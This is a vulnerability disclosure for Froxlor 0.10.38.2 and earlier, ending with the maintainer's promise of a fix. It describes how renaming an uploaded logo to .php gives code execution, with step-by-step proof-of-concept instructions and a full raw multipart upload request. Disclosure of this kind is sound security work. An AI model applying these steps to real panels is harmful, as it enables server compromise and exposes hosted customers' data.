froxlor/froxlor <= 0.10.38.2 - Authenticated Unrestricted File Upload to RCE in froxlor/froxlor
Reported on
Nov 7th 2022
Description
Froxlor's panel settings page (System -> Settings -> Panel settings, handled by /admin_settings.php) lets an administrator upload a header logo and a login logo. In versions up to and including 0.10.38.2 the upload handler does not validate the uploaded file's name (extension), type or contents; it relies on what the browser's file picker sent. An attacker with an administrator account can therefore intercept the request, rename the file to a .php extension and have the server store it as-is in a web-accessible location. Requesting the stored file executes it, so the missing check turns an image upload into remote code execution on the panel host.
Proof of Concept
1. Enable an HTTP intercept proxy, such as Burp Suite.
2. Log in to the administrator account.
3. With interception turned on, use a browser to navigate to: System -> Settings -> Panel settings.
4. In the Logo Image (Header) or Logo Image (Login) field, upload a file named s.jpg (for step 6 its body must contain the PHP code to execute; only the name needs to look like an image to the browser).
5. In the proxy, catch the POST request to /admin_settings.php, change the filename of the panel_logo_image_header part from s.jpg to s.php (the Content-Type: image/jpeg can stay, it is not checked), then forward the request.
6. The server accepts the .php name and stores the file. Requesting the stored file through the web server executes the embedded PHP, giving arbitrary code execution on the server.
Request
POST /admin_settings.php HTTP/1.1
Host: localhost:8001
Content-Length: 166194
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySYA7fVL8S7T9epDH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8001/admin_settings.php?page=overview&part=panel&s=3f573ee5ef049a0728ea376883d4d3d9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="send"
send
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="s"
3f573ee5ef049a0728ea376883d4d3d9
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="page"
overview
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="action"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_standardlanguage"
English
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_default_theme"
Sparkle
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"
1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"
1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"
1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_paging"
20
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_pathedit"
Manual
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail"
admin@localhost
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_defname"
Froxlor Administrator
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_return"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_decimal_places"
4
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpmyadmin_url"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webmail_url"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webftp_url"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_login"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_footer"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"
1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_show_news_feed"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_news_feed_url"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_admin"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_customer"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpconfigs_hidestdsubdomain"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_imprint_url"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_terms_url"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_privacy_url"
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridetheme"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridecustom"
0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_header"; filename="s.php"
Content-Type: image/jpeg
<image content>
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_login"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="part"
panel
------WebKitFormBoundarySYA7fVL8S7T9epDH--
Impact
An authenticated administrator (or anyone who has taken over an administrator's session or credentials) can turn the logo upload into a web shell and execute arbitrary code as the web server user on the Froxlor host. Because Froxlor administers the server's customers, domains, databases and mail accounts, this compromises the hosting system and the data it holds, not just the panel itself. The precondition is administrative access to the panel, so the issue is an admin-to-server privilege escalation rather than an unauthenticated attack.
As per email upfront, thanks again for finding this. It will be resolved in the next release on 2nd of December.